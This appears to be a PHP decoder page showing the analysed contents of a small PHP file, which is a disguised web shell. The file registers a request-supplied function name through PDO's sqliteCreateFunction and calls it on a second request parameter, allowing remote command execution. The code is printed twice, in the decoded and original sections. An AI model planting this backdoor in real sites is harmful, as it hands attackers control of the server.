Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $e = $_REQUEST['e']; $db = new PDO('sqlite:sqlite.db3'); $db->sqliteCreateFunctio..

Decoded Output download

<?php 
$e = $_REQUEST['e']; 
$db = new PDO('sqlite:sqlite.db3'); 
$db->sqliteCreateFunction('myfunc', $e, 1); 
$sth = $db->prepare("SELECT myfunc(:exec)"); 
$sth->execute(array(':exec' => $_REQUEST['pass'])); 
?>

Did this file decode correctly?

Original Code

<?php
$e = $_REQUEST['e'];
$db = new PDO('sqlite:sqlite.db3');
$db->sqliteCreateFunction('myfunc', $e, 1);
$sth = $db->prepare("SELECT myfunc(:exec)");
$sth->execute(array(':exec' => $_REQUEST['pass']));
?>

Function Calls

None

Variables

$e None

Stats

MD5 197b2a25161c65ff3cab6846b8a379d3
Eval Count 0
Decode Time 91 ms